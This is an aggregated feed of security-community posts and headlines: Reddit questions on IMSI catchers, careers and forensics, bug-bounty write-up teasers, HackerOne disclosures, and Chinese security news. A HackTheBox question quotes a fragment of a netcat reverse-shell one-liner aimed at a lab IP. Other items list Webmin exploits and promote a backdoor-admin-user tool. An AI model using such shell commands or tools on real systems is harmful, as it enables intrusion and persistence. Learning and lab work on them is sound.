    Hi! Let's say I am looking for some webmin exploit through searchsploit: searchsploit webmin ---------------------------------------------------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path ---------------------------------------------------------------------------------------------------------------------------- --------------------------------- DansGuardian Webmin Module 0.x - 'edit.cgi' Directory Traversal | cgi/webapps/23535.txt phpMyWebmin 1.0 - 'target' Remote File Inclusion | php/webapps/2462.txt phpMyWebmin 1.0 - 'window.php' Remote File Inclusion | php/webapps/2451.txt Webmin - Brute Force / Command Execution | multiple/remote/705.pl webmin 0.91 - Directory Traversal | cgi/remote/21183.txt Webmin …  ( 2 min )
    I've read about IMSI catchers being a security threat, but I'm not sure I should actually be worried about them. If someone grabbed an IMSI# with an IMSI catcher, how would they get any usable information about me? Is my personal information at risk or is this just a random unusable string to most?
    The paper that drew this to my attention: https://arxiv.org/pdf/1510.07563.pdf Corresponding article: https://arstechnica.com/information-technology/2015/10/low-cost-imsi-catcher-for-4glte-networks-track-phones-precise-locations/ In the paper, it claims that they can pull IMSI and IMEI off of smartphones, but I see no claim of knowing what the number or name of the phone is. If all they have is an IMSI and IMEI, am I really at risk? Is is usable information to have these numbers to a person who is undefined. Like, if someone stole my gmail password without knowing who I was or my account name, they could try it in every gmail account starting at a@gmail.com, but that might take a long time. Right? So the question is basically, is there actually a danger present in having my IMSI and IMEI accessed due to either the release of the information itself or in that there might be a way to connect it to me that I'm not aware of? I tried looking through Wikipedia for an answer. It's either not there or I'm too dumb. Either way I'd appreciate help in my paranoid quest for knowledge if any Redditors would be kind enough to offer it. tl;dr: What can an IMSI catcher know? & What can the operator do with that information? submitted by /u/iExtrapolate314 [link] [comments]  ( 2 min )
    Looking for resources on detection engineering
    Hi there, I am trying to develop myself in detection engineering, have you got any interesting resources on the topic? Cheers submitted by /u/zakibros [link] [comments]  ( 1 min )
    I know that Stingrays can capture IMSI #s from nearby smartphones. Can they also capture phone numbers and personal data too or is it just the serial number?
    I know the authorities might have a database, but let's say a hacker picked up my smartphone with an IMSI catcher. They really know nothing right? Because they can't extract anything useful from that, right? Is that true or am I being naive. I read a paper that claimed that the extraction of IMSIs from smartphones was a security threat, but without a phone number, it doesn't seem all that useful to them. Article: https://arstechnica.com/information-technology/2015/10/low-cost-imsi-catcher-for-4glte-networks-track-phones-precise-locations/ Paper: http://go.redirectingat.com/?id=100098X1555750&xs=1&url=http%3A%2F%2Farxiv.org%2Fabs%2F1510.07563&sref=rss submitted by /u/anon314159265358p [link] [comments]  ( 3 min )
    how does a malware call back using DGA DNS?
    I was reading more into solarwinds hack and I noticed that the malware called back home using a DHA DNS algorithm, but I'm struggling to understnad how did they hackers know which domain to buy/use for their malware? based on the article: https://en.wikipedia.org/wiki/Domain_generation_algorithm I can understand how the malware generates the domain names but how does c2 and malware meet at a certain domain name? Especially if the malware generates 50k domains ? submitted by /u/ak_z [link] [comments]  ( 3 min )
    OK what’s the Reddit hack to wear you can’t send a private message because it thinks you have over 100 letters of tax this is currently going on I was banned for some thing I have no clue of why trying to figure this out
    submitted by /u/itwasEMOTIONALmurder [link] [comments]
  • Open

    Scanning millions of domains and compromising the email supply chain of Australia's most respected institutions
    submitted by /u/Jumpy_Resolution3089 [link] [comments]  ( 1 min )
  • Open

    Scanning millions of domains and compromising the email supply chain of Australia's most respected institutions
    submitted by /u/Jumpy_Resolution3089 [link] [comments]  ( 2 min )
  • Open

    Authentication Bypass & ATO
    Hi guys this is Karthik. I hope you all are doing good. I’m back with another interesting write-up “Authentication Bypass which leads to… Continue reading on Medium »  ( 1 min )
    Get your own Hacking VPS for free in 2022!!
    Introduction Continue reading on Medium »  ( 3 min )
    Host Header Injection Lead To Account Takeover
    Hello amazing hacker, Today, I want to talk about one of my finding in private pentest program that lead me takeover other user account by… Continue reading on Medium »  ( 2 min )
    PHP Type Juggling Vulnerability
    بِسْمِ ٱللَّٰهِ ٱلرَّحْمَٰنِ ٱلرَّحِيمِ Continue reading on Medium »
    STORED XSS
    Hello Everyone, Continue reading on Medium »  ( 2 min )
    2FA bypass by reading the documentation
    This is a fairly simple and short writeup, but i think is worth sharing, so lets get started. Continue reading on Medium »  ( 1 min )
  • Open

    blog/wp-json/wp/v2/users FILE is enable it will used for bruteforce attack the admin panel at blog/wp-login.php
    Mail.ru disclosed a bug submitted by kassem_s94: https://hackerone.com/reports/1403302
  • Open

    Subpoenaed iPhone and delay in turning it over to police--general outline of what can be lost in this delay?
    Ongoing case with Alec Baldwin and on set shooting that resulted in death. Phone was subpoenaed in mid December, still hasn't been turned over. Link to subpoena in comments. Cell carrier is Verizon. By delaying, I would think anything he has deleted will be much harder to recover, since the memory will be overwritten? Any general information or thoughts would be appreciated. submitted by /u/bbsittrr [link] [comments]  ( 3 min )
    Forensic computers
    Does anyone have experience with Siforce forensic workstations? How do they compare to Sumuri Talinos? submitted by /u/HorseAdministrative7 [link] [comments]  ( 2 min )
  • Open

    Hear No Evil: An Introduction to Audio File Analysis for OSINT
    It’s a new year, and that also means new blog posts about all things OSINT and Digital Forensics. In this one, we’re going to dive into… Continue reading on Medium »  ( 5 min )
    Certified in Open Source Intelligence (C|OSINT) Review
    Certification for OSINT Professional Continue reading on Medium »  ( 1 min )
  • Open

    SecWiki News 2022-01-09 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    SecWiki News 2022-01-09 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    Attacktive Directory — Exploitation of Vulnerable Domain controller [TryHackMe]
    99% of Corporate networks run off of AD. But can you exploit a vulnerable Domain Controller? Continue reading on System Weakness »  ( 8 min )
    Attacktive Directory — Exploitation of Vulnerable Domain controller [TryHackMe]
    99% of Corporate networks run off of AD. But can you exploit a vulnerable Domain Controller? Continue reading on Medium »  ( 7 min )
  • Open

    potato journal articles
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]  ( 1 min )
  • Open

    Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit
    submitted by /u/soupcreamychicken [link] [comments]

  • Open

    Differential Fuzzing for Smart Contract VMs
    Article URL: https://github.com/fgsect/NeoDiff Comments URL: https://news.ycombinator.com/item?id=29857384 Points: 2 # Comments: 0  ( 2 min )
    Smart Contract VM Bugs via Differential Fuzzing [pdf]
    Article URL: https://raw.githubusercontent.com/fgsect/NeoDiff/main/roots21-2.pdf Comments URL: https://news.ycombinator.com/item?id=29850086 Points: 2 # Comments: 0  ( 119 min )
  • Open

    My OD full of japanese music and more.
    http://193.104.197.109/ submitted by /u/Connor_CZ [link] [comments]
  • Open

    From email to Github accounts
    While searching lately for new OSINT techniques on Github, I have found an old repository entitled “enumerate-github-users” by antnks. Continue reading on Medium »  ( 1 min )
    Understanding Web Fuzzing for Ethical Hacking
    Websites have unique addresses just like your home address known as a Uniform Resource Locator (URL). If multiple entities shared one… Continue reading on Medium »  ( 2 min )
    Weaponizing Information: To the Agitator Go the Spoils of OSINT
    *Note: This article was originally published by the author on March 9, 2020. Continue reading on Medium »  ( 5 min )
    The OSINT-ification of Job Boards: Hunting the Hunters
    *Note: This article was originally published by the author on July 2, 2019. Continue reading on Medium »  ( 11 min )
    How I Used OSINT to Find an Abandoned Hotel
    Continue reading on Medium »  ( 3 min )
    Applying OSINT Tactics to Twitter
    Allow me to begin by stating that the accounts (and tasks) depicted in this article were created for the purpose of OSINT education… Continue reading on Medium »  ( 3 min )
  • Open

    Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit
    submitted by /u/dmchell [link] [comments]
    Windows Process Listing using NTQuerySystemInformation
    Get acquainted with the undocumented low-level yet powerful APIs from winternls and how to use the NtQuerySystemInformation function to get a list of all the processes running in the system. https://tbhaxor.com/windows-process-listing-using-ntquerysysteminformation/ submitted by /u/tbhaxor [link] [comments]
    Get expert training on advanced hunting
    submitted by /u/dmchell [link] [comments]
  • Open

    MSRC researcher recognition and CEO of DSPH at 18 years
    Hi everyone,  It was 7 January 2022 when I woke up from sleep I saw an email from MSRC i thought it must be related to the vulnerability… Continue reading on Medium »  ( 1 min )
    Research on Host Header Injection — Cyber Sapiens Internship Task-11
    Hello guys👋👋 ,Prajit here from the BUG XS Team and Cyber Sapiens United LLP Cybersecurity and Red Team Intern, in this I am regularly… Continue reading on Medium »  ( 2 min )
    Research on XML eXternal Entity Injection (XXE)-Cyber Sapiens Internship Task-10
    Hello guys👋👋 ,Prajit here from the BUG XS Team and Cyber Sapiens United LLP Cybersecurity and Red Team Intern, in this I am regularly… Continue reading on Medium »  ( 4 min )
    Research on HTML Injection- Cyber Sapiens Internship Task-9
    Hello guys👋👋 ,Prajit here from the BUG XS Team and Cyber Sapiens United LLP Cybersecurity and Red Team Intern, in this I am regularly… Continue reading on Medium »  ( 3 min )
    IDOR: A BEGINNER’S GUIDE
    IDOR is a type of access control vulnerability. IDOR vulnerability can occur when user-supplied input is received by the web server to ret Continue reading on Medium »  ( 2 min )
    How to remove crap using ‘cut’ cmd from Httprobe output?
    Default output from httprobe looks like; In certain conditions as ➖ Continue reading on Medium »  ( 1 min )
  • Open

    SecWiki News 2022-01-08 Review
    有用的无用模型:网络安全中复杂问题的建模方法 by ourren APT新趋势:战略性休眠域名利用率提升,检测困难 by ourren 2021年网络安全产业态势总结 by ourren 2021 年全球主要网络安全威胁发展态势 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    SecWiki News 2022-01-08 Review
    有用的无用模型:网络安全中复杂问题的建模方法 by ourren APT新趋势:战略性休眠域名利用率提升,检测困难 by ourren 2021年网络安全产业态势总结 by ourren 2021 年全球主要网络安全威胁发展态势 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    How does SAMBA differ between NULL authentication and anonymous authentication?
    Context: I am a penetration tester and I am trying to learn more deeply about SMB. I use the tool crackmapexec to enumerate SMB, and I recently came across something weird when trying the following commands: - crackmapexec smb IP This sets the Domain name, User name, and Host name to NULL - crackmapexec smb IP -u '' -p '' This sets the Domain name, but sets the User name, and Host name to NULL - crackmapexec smb IP -u 'anything' -p '' This sets the Domain name, User name, and Host name This made me wonder, why does SAMBA treat any username as an anonymous login? Question: I've been looking through the SAMBA documentation (which is horrible someone please change this), to find what allows/disallows NULL and anonymous authentication. However, I have been unable to find what settings allow these. submitted by /u/jakeyee [link] [comments]
    book suggestions for highly technical subjects
    Hi Reddit, I'm looking for books similar to The ShellCoder Handbook but with updated contents. I'm focused on the exploit dev part. But anything else is also fine as long as it's highly technical. submitted by /u/ak_z [link] [comments]
    Spyware paranoia and tools to use to scan
    I have been suspecting a long-term 'friend' of mine has been spying on me for a while now due to suspicious things they say and suspicious activity in general. Their motivation I suspect due to their personality and history (if they are indeed spying on me) is just to fuck with me or to gather information on me for later usage. I would like to know of any tools I can use to discover any keyloggers, screen capturers, or other types of spyware that can access my social media accounts, browser, or just my device in general. I have scanned my device with a malware scanner and windows defender already, but nothing major has been discovered. I'm wondering if I should do a rootkit scan as well? Thanks Edit: Obviously, I'm aware this is an unlikely scenario, but there have just been a lot of big 'coincidences' that have been bugging me and I'm trying to do some research. If you ignore the background story, I guess I'm just trying to find out current/relevant possible attack vectors/specific tools for low-level personal spying (hardware, software, and network-based). And then, the appropriate tools and methods a defender would use. I apologise that this seems to be the wrong subreddit but I would appreciate any redirects to relevant subreddits/external resources. submitted by /u/Large-Run9434 [link] [comments]
  • Open

    Project to Regularly and Automatically Update Docker Images that contains a lot of NetSec related tools
    submitted by /u/deleee [link] [comments]
  • Open

    被忽视的NTP安全
    时间是我们平时最关注,而最有不关注的问题,但是针对时间NTP协议的攻击所带来的危害是非常巨大的,需要引起我们的关注。
  • Open

    Zest와 ZAP! 강력한 보안 테스트 루틴을 만들어봐요 ⚡️
    What is Zest Zest는 Mozilla 보안팀에서 만든 JSON 기반의 스크립팅 언어입니다. 보다 쉬운 웹 테스팅을 위해서 만들어졌고, 저는 테스팅 시 ZAP에서 자주 사용합니다. Zest in ZAP 사실 JSON 포맷 자체가 rewrite가 좋은 포맷은 아니라서(그래서 config는 yaml이나 toml을 많이 쓰죠) 직접 작성하면서 쓰기에는 좀 불편한 감이 많이 있습니다. 다만 이 Zest가 ZAP 안에서 사용하는 경우 GUI Interface를 통해 로직을 통제할 수 있기 때문에 이러한 불편함은 사라지게 됩니다. Zest Structure Zest는 JSON 포맷으로 스크립트의 타입, 파라미터 등을 명시할 수 있습니다.
    [Cullinan #25] 앞으로의 계획
    컬리넌 로그 #25입니다. 사실 이번에는 업데이트 로그라기 보단 앞으로의 계획을 좀 더 공유드릴까 해서 작성해봅니다. Cullinan이란? 먼저 Cullinan은 제가 작년 3월부터 시작한 토이 프로젝트로 흩어진 블로그 글을 하나의 위키 형태로 모으고 지속적으로 관리할 수 있도록 하는 프로젝트였습니다. 그 시작은 여기에 있네요. 기존의 글들을 모아 하나의 항목으로 만들고, 또 제가 안다뤘었던 항목들도 하나하나 추가하다보니 벌써 41개의 페이지가 생겼습니다. 앞으로도 많은 항목을 추가할껀데(노션에 작성중인게 잔뜩 쌓여있습니다 😅), 이제는 이를 표현하는 방법에 대해서도 조금 더 고민할까 합니다.

  • Open

    Timing-Based Username Enumeration: What’s a fix versus mitigation?
    For web-based applications, Timing-based Username Enumeration is a great find. For testers it’s low-hanging fruit and a great way to… Continue reading on Medium »
    December UI/UX Contest Winner
    and our $425 prize winner is…🏆 Continue reading on SW DAO »  ( 1 min )
    A Cool Account Takeover Vulnerability due to lack of Client Side Validation
    Hello Everyone, My Name is Arth Bajpai , I’m from Lucknow India and this is my First writeup related to bug bounty Continue reading on Medium »  ( 2 min )
    Tinyman Bug Bounty Campaign
    Tinyman announces bug bounty campaign. Continue reading on Medium »  ( 1 min )
    Being Anonymous on the Internet(proxychains)
    Proxy chains Continue reading on Medium »  ( 1 min )
    Bypassing Door Passwords
    Instead of a key, this type of lock system requires a numerical code to grant entry to a facility or property. The code is punched in by… Continue reading on Medium »  ( 1 min )
    GYSR Bug Bounty Program
    Our highest priority has always been safety and security. Introducing the GYSR bug bounty program in partnership with Immunefi. Continue reading on GYSR »  ( 1 min )
    XXE — TryHackme WriteUp
    XML External Entity Writeup Continue reading on InfoSec Write-ups »  ( 2 min )
    How i got financial advisor by simply hack into their membership plan !
    Hello Infosec geeks Continue reading on Medium »  ( 1 min )
    A TALE OF 5250$ : HOW I ACCESSED MILLIONS OF USER’S DATA INCLUDING THEIR NATIONAL ID’S
    Hi, Hope you guys are doing well, And a Happy New Year, YAY! ✨, Let’s start the blog without wasting more time. Continue reading on InfoSec Write-ups »  ( 2 min )
  • Open

    Received a Performance Evaluation yesterday
    First time poster here. Previous post for context: https://www.reddit.com/r/SecurityCareerAdvice/comments/rc6awd/i_passed_iso_27001_at_the_company_i_work_for/ As the title says, I got a performance evaluation today with a raise! One thing they asked me to look into is to find credentials (IT Standards like 27K1) to improve the organization. We just passed ISO 27001, so I'm guessing they are looking to expand themselves with additional credentials (IT Standards like 27K1). Any ideas? FYI, the company is a software-as-a-service business. submitted by /u/LordCommanderTaurusG [link] [comments]  ( 1 min )
    Internal Log4J attempts?
    hey guys, I understand somewhat how the exploit works but when you see in the logs a log4j exploit attempt that is internal to internal attempting a request for an outside LDAP server. How could that happen exactly? As in how was that request made in the first place? Does it mean the internal machine was exploited or is it just a request attempt through another means? If the machine is not vulnerable to make outgoing requests, is it just a case of blocking the server IP? Or is the mere fact that an attempt was made indicate vulnerability? Hopefully that made sense! Thanks submitted by /u/_illusions25 [link] [comments]  ( 1 min )
    How best to send sensitive personal identity documents to new employer?
    Starting a new job remotely and they've hit me via email with the I-9 Form, W4, and Direct Deposit Paychex form. So the forms have my SSN, bank details and personal info + my passport as an additional identity document. How do I send this stuff responsibly? I was thinking I could password protect each PDF inside a zip file and then call them to give them the password. What software do I need to encrypt these PDFs? Any recommendations or advice on a best practice here? submitted by /u/ChampionSSJ [link] [comments]  ( 2 min )
    CISSP Advice
    Just like that title says, what advice would you give someone that will begin studying for this cert. Like is there a specific book, study guide/resources you’d recommend? I know there is a ton of material out there but some is hard to follow. Recent test takers advice is appreciated. Thanks! submitted by /u/zzizourm [link] [comments]  ( 3 min )
    CEH and CEH Master worth it
    is the CEH and CEH Practical worth taking if I am in my junior year in computer science? will it help at least land me an interview in a company? is it accredited in Canada? [Edit] Thank you so much for your comments, I will be shifting to eJPT and maybe CISSP after. submitted by /u/deadmeme-1 [link] [comments]  ( 4 min )
  • Open

    NPM might be executing malicious code in your CI without your knowledge
    submitted by /u/words_are_sacred [link] [comments]  ( 1 min )
    Mutual Authentication: A Component of Zero Trust
    submitted by /u/alexfornuto [link] [comments]
    Lopsided routing, a stealthy hole punch into FortiGate
    submitted by /u/oherrala [link] [comments]  ( 1 min )
    PHP 7.3-8.1 disable_functions bypass using string concatenation (PoC)
    submitted by /u/dradzenglor [link] [comments]
  • Open

    Bypass Cloudflare
    My leak bot https://twitter.com/leak_scavenger for a long time crawled the website ghostbin.co. Some of you asked how my bot is able to do… Continue reading on Medium »  ( 2 min )
    OSINT — Obter o E-mail de um Perfil do Linkedin
    Devido aos vazamentos de dados do Linkedin algumas informações como o ID e o E-mail do perfil do usuário foram disponibilizados no… Continue reading on 100security »  ( 1 min )
  • Open

    thefLink/Hunt-Sleeping-Beacons: Aims to identify sleeping beacons
    submitted by /u/dmchell [link] [comments]
    NOBELIUM’s EnvyScout infection chain goes in the registry, targeting embassies
    submitted by /u/dmchell [link] [comments]
    Bypassing Door Passwords w/wo default passwords
    submitted by /u/SocketPuppets [link] [comments]
    EDR Parallel-asis through Analysis - @MDSecLabs
    submitted by /u/dmchell [link] [comments]
  • Open

    Email threads about potatoes (recipes, etc)
    submitted by /u/ryankrage77 [link] [comments]
    Google drives were always a debatable content on this sub. Now it seems that the "don't be evil" firm will answer this question for you.
    https://www.techradar.com/news/google-drive-could-soon-start-locking-your-personal-files EDIT: For clarification, your personal data (I guess even copyrighted material) not publicly available (open) are not concerned. But the findings shared here may become more and more rare. submitted by /u/krazybug [link] [comments]  ( 2 min )
    Wide selection of fairly recent magazines, mostly English language, but also German, Dutch and others
    submitted by /u/Dutchlawyer [link] [comments]
    Christmas Movies
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    Another music one
    submitted by /u/International_Milk_1 [link] [comments]
    VARIOUS (300 TBS OF STUFF. Tom and Jerry cartoons, K-pop music. courses on bitcoin, and video ediing. Excel for beginners. and so on.
    submitted by /u/International_Milk_1 [link] [comments]
    more music (Some empty folders)
    submitted by /u/International_Milk_1 [link] [comments]
    K-POP. METAL, ROCK
    submitted by /u/International_Milk_1 [link] [comments]
    MUSIC
    submitted by /u/International_Milk_1 [link] [comments]
  • Open

    SecWiki News 2022-01-07 Review
    《2021太空安全报告》 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    SecWiki News 2022-01-07 Review
    《2021太空安全报告》 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    预计 2025 年,反病毒软件市场规模将达到 45.4 亿美元
    2025年,反病毒软件市场规模预计将达到45.4亿美元。  ( 1 min )
    FreeBuf早报 | 上海首笔数字人民币就业补贴落地;VMware 解决产品中堆溢出漏洞
    能将相应的数据验证和交叉比对,为打击违法犯罪提供信息支持。  ( 1 min )
    Bandit通关记录【linux基础命令学习】
    Bandit是一个学习Linux的网站,它采用游戏通关的方式来帮助我们学习linux基本使用的命令,十分适合没有基础或基础较弱的同学学习,本篇通关了所有关卡并对相关知识进行了记录和收集。  ( 1 min )
    时间定了!CIS 2021网络安全创新大会Spring·春日版来袭
    大会已正式定档于3月2日至3日在上海宝华万豪酒店举办。  ( 1 min )
    新人必看!关于dom型xss和反射型xss的区别
    这篇文章可以给新入坑的小白更好的理解xss漏洞,也通过这篇文章巩固一下我对xss的理解,如有不正确的地方欢迎各位师傅斧正。  ( 1 min )
    FreeBuf甲方群讨论 | 聊聊网络安全供应商整合(本期内含彩蛋话题)
    Gartner预测,网络安全供应商整合将成为2022年的行业趋势之一,大多数组织都将供应商整合视为提高安全性的途径。  ( 1 min )
    新年伊始,斗象科技收到2022年的第一次认可
    新的一年,斗象科技将勤修内功,以更加卓越的产品和服务,更好地完成各项任务。
    FreeBuf周报 | NoReboot恶意软件让iPhone假装关机;看视频时,黑客窃取信用卡信息
    我们总结推荐了本周的热点资讯、优质文章和省心工具,保证大家不错过本周的每一个重点!  ( 1 min )
    NoReboot恶意软件让iPhone假装关机
    该技术直接模拟了用户iPhone设备关机时的情景,禁用了大多数的物理反馈,因此iPhone看起来跟真的关机了一样。  ( 1 min )
    黑客盗窃加密货币使用了哪些“手段”?
    以下是有史以来五大加密货币盗窃案的汇总,或许能发现一些加密货币被盗的规律。  ( 1 min )
    FinalSite遭受勒索软件攻击,数千个学校网站无法访问
    近年来,学校已成为勒索攻击的热门目标,尤其是一些安全建设资金有限的K12学校。  ( 1 min )
    华米科技招聘高级安全工程师
    华米科技创立于2013年是一家全球领先的智能可穿戴创新公司,希望通过“云健康云服务+端可穿戴终端+芯芯片”的布局以科技的力量推动全球每个人享有更好的运动、健康及医疗服务。
    安全知识图谱 | Log4j事件云端数据分析
    实现高级威胁的精准和快速定位  ( 1 min )
    利用AppInfo RPC服务的UAC Bypass技术详解
    在我们先前的攻击技术研判中曾介绍了一种较新的UAC Bypass在野利用手法,本文将再次对其技术细节进行深入分析。  ( 1 min )
  • Open

    Detecting Web Attacks Using A Convolutional Neural Network
    Introduction  ( 4 min )
    Authorization bypass — Gmail
    About the vulnerability  ( 3 min )
    Day 4, CN-Network Topologies #100DaysofHacking
    Day1 : Installing Kali Linux  ( 4 min )
    [IDOR] add or remove the linked publications from Author Publisher settings — Facebook Bug Bounty
    Facebook Linked Publications ( Authorship or Author Tag ) feature was designed to give journalists more credit and visibility for the…  ( 2 min )
  • Open

    Detecting Web Attacks Using A Convolutional Neural Network
    Introduction  ( 4 min )
    Authorization bypass — Gmail
    About the vulnerability  ( 3 min )
    Day 4, CN-Network Topologies #100DaysofHacking
    Day1 : Installing Kali Linux  ( 4 min )
    [IDOR] add or remove the linked publications from Author Publisher settings — Facebook Bug Bounty
    Facebook Linked Publications ( Authorship or Author Tag ) feature was designed to give journalists more credit and visibility for the…  ( 2 min )
  • Open

    Detecting Web Attacks Using A Convolutional Neural Network
    Introduction  ( 4 min )
    Authorization bypass — Gmail
    About the vulnerability  ( 3 min )
    Day 4, CN-Network Topologies #100DaysofHacking
    Day1 : Installing Kali Linux  ( 4 min )
    [IDOR] add or remove the linked publications from Author Publisher settings — Facebook Bug Bounty
    Facebook Linked Publications ( Authorship or Author Tag ) feature was designed to give journalists more credit and visibility for the…  ( 2 min )
  • Open

    7+ Major Reasons to Hire a Red Team to Harden Your App Sec
    The growing cyberthreat landscape has brought a storm in the online marketplace. From the online studies and research, there were around… Continue reading on Medium »  ( 4 min )
  • Open

    Exploiting Redash instances with CVE-2021-41192
    Article URL: https://ian.sh/redash Comments URL: https://news.ycombinator.com/item?id=29834624 Points: 1 # Comments: 0  ( 5 min )
  • Open

    Is it possible to extract WhatsApp data from this type of scenario?
    Phone: Iphone XS (A12 chip) [Wipe data after 10 attempts is ON] Passcode: Unkown iOS Ver: 14.7 Mode: AFU WhatsApp: 2FA Active I have access to UFED, Oxygen, XRY also I have budget more tools if there is any tool that is capable of doing it. Thank you in advance. submitted by /u/wtfisgoingong1 [link] [comments]  ( 1 min )

  • Open

    Unprotected directory of [NSFW] videos and images from internet sex work
    submitted by /u/Shark_Octopus [link] [comments]
    Movies
    submitted by /u/International_Milk_1 [link] [comments]
    "Soul, Hip Hop, Rare Grooves, House and Jazz "
    submitted by /u/International_Milk_1 [link] [comments]
    EPISODES of StarTrek-NewVoyages.
    submitted by /u/International_Milk_1 [link] [comments]
    Capybaras
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]  ( 1 min )
    movie stills featuring reptiles and amphibians.
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
  • Open

    The JNDI Strikes Back – Unauthenticated RCE in H2 Database Console
    submitted by /u/SRMish3 [link] [comments]
    Garlicshare - Private and secure file sharing over the Tor network
    submitted by /u/ILDVUCE [link] [comments]  ( 1 min )
    Announcing the first open source security tool for Heroku!
    submitted by /u/cloud-defender [link] [comments]
    SANS Christmas Challenge 2021 - Write-up
    submitted by /u/the-useless-one [link] [comments]  ( 1 min )
  • Open

    Imagining a live server
    I wanted to ask if there was a good way to create a forensic image of a server that can't be taken offline? ​ Thanks submitted by /u/Pizza_Eating_Robots [link] [comments]  ( 1 min )
    Any free practice images out there
    Hi people, I work within digital forensics and I'm currently off work with covid due to the nature of my job i cannot work from home and was wondering if theres any websites out there that provide disk images for fictional triage / investigation. Thanks in advance submitted by /u/LukeT1123 [link] [comments]  ( 1 min )
  • Open

    Good security certs to obtain for better progression
    Hi I have been working in the information security industry for around 2 years now and recently secured a permanent role in the UK. My roadmap for this year is to obtain security certs and this is what I am planning: CompTIA Security+ Microsoft Azure Fundementals What advice do you have to reach a £75K+ salary in the next two to three years? Thanks submitted by /u/gavxz [link] [comments]  ( 1 min )
    Technicalities in VPN effectivity: Can anyone online tell when you're using a VPN?
    If a VPN disguises your IP address when you use the internet, do internet providers and the websites you visit realise that you're using a VPN or do they get the perfect impression that you're a normal internet user from wherever it is you go with your VPN. For reference, here are a few scenarios where your cover could be compromised: An internet user using an internet company only functional in Australia would be in say, Pakistan through a VPN. You lose your connection to your VPN more than once on the same website (so you're switching back and forth between locations in seconds) trackers could not only realise that you're using a VPN but also know your actual location. (It may not be the case that this is how VPN works but:) Among its many available locations, say for example you chose NY, USA, if a VPN provider simply transports all its users choosing NY, USA to one precise location in NY, wouldn’t it be clear that all that activity coming from one spot, down to the coordinate isn’t really thousands of computers crammed in one area but people using the same VPN service. I have loads of thoughts on how if someone really really wanted to find your location, they could definitely do so, and how even small windows of error are subject to great scrutiny online. However, it's all dependant on how much of my speculation is actually true. Cheers! This question has been posted on other relevant subreddits as well. submitted by /u/lazariomo [link] [comments]  ( 3 min )
    Digital certificates: why do the certificates not get stolen?
    I am probably missing something here, but I don't get how digital certificates prove the identity of whoever has them. Granted, if someone decrypts a certificate with the public key of a certificate authority and retreives the public key of a certain party, they can know for sure that this authority once signed the certificate request for said party, but can't any given person retreive that certificate from that party, and then start providing it as if it was their own? submitted by /u/Pegasus9208 [link] [comments]  ( 3 min )
    HackTheBox Nibbles: Full TTY Shell how?
    So I'm reading a walkthrough of Nibbles from 0xdf and they used a PHP code like: &1|nc 10.10.15.154 8082 >/tmp/f"); ?> I was stuck for hours trying to get a full TTY shell, and none of the guides on breaking out of limited shell has worked. Clearly, 0xdf knew what he was doing. I want to learn more about what this command is doing: Where does one learn how to do this? Is there more of where this comes from? (I'd like to learn more so I can note it down) What is the logic behind this? Why is this superior to the reverse shell PHP I crafted using MSFVENOM? I'd like to be provided a fishing rod and a lake, rather than the fish. I'd like to learn how to do these things before I read up on how somebody else did it. I'm also okay with paid resources on the subject (books, courses, subscription), as I believe content creators should be paid for their skill and time. submitted by /u/DiickBenderSociety [link] [comments]  ( 1 min )
    Who is hosting the most malware?
    I would like to know from your experience where have you seen the most malware, most often, if you would have to choose between IBM networks, DigitalOcean, Microsoft, ATT, Google, Akamai, Github and Amazon networks? submitted by /u/ciovlici [link] [comments]  ( 2 min )
    How do I start building the security team?
    Hello everyone, I'm currently working on a small startup company as the one of the 5 people as admin / engineer / architech / security people / printer fixer / security analyst I realize that the team is quickly burnt out with the variety of task and mountains of unending work on this state. I talk to my boss about this and he agree that something needs to be done. We are planning to hire a third party vendor to do some of the stuff. However, my boss is quite adamant that the security roles muat be done in house and ask me to create a plan on how many division we need to create, how many people to hire etc. Is there any guide out there that can help me with this in CIS style with focus on scalability? So for example in small organization you need at least these teams, later on you can add these teams etc. Or can you guys share how did your organization tackle this challenge? Any input is greatly appreciated. Thanks for sharing submitted by /u/XynderK [link] [comments]  ( 4 min )
  • Open

    Grafana LFI on https://grafana.mariadb.org
    MariaDB disclosed a bug submitted by realtess: https://hackerone.com/reports/1419213
  • Open

    Another simple .NET executable to create and add a backdoor user
    Another simple but useful .NET executable that creates and adds an arbitrary user or domain user to the Local Administrators groups. Very useful for privilege escalations on Windows (i.e. unquoted service path) Repo: https://github.com/notdodo/LocalAdminSharp submitted by /u/d_o_d_o_ [link] [comments]  ( 1 min )
    Cobalt Strike Sleep Mask IOC
    https://codex-7.gitbook.io/codexs-terminal-window/blue-team/detecting-cobalt-strike/sleep-mask-kit-iocs ​ Recently noticed an IOC of the sleep mask kit while testing my own payloads, being the hook on the sleep() winapi. submitted by /u/CodeXTF2 [link] [comments]
    What Is Red Teaming, How Does It Work and Why Is It Important?
    submitted by /u/stanley9528 [link] [comments]  ( 1 min )
  • Open

    SecWiki News 2022-01-06 Review
    某系统漏洞挖掘之固件分析 by ourren DataCon2021域名体系安全赛道黑产方向赛题深度解析 by ourren 浅谈数据安全运营能力建设 by ourren 2021年“CCF优秀博士学位论文奖”列表及全文 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    SecWiki News 2022-01-06 Review
    某系统漏洞挖掘之固件分析 by ourren DataCon2021域名体系安全赛道黑产方向赛题深度解析 by ourren 浅谈数据安全运营能力建设 by ourren 2021年“CCF优秀博士学位论文奖”列表及全文 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    Utilizando BBRF com foco em Reconnaissance #bugbounty
    Olá tudo bem? Continue reading on Medium »  ( 4 min )
    My First Bug Bounty Report | POST-based XSS
    Hello Ninjas!!!! I am Vishal Barot aka vFlexo and today I decided to publish a write-up on how I got first bounty through my first ever… Continue reading on Medium »  ( 2 min )
    Authorization bypass — Gmail
    About the vulnerability Continue reading on InfoSec Write-ups »  ( 2 min )
